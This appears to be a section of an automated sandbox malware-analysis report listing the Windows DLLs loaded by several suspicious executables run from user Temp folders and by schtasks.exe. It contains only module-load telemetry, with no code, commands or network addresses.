Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Section loaded: sspicli.dll
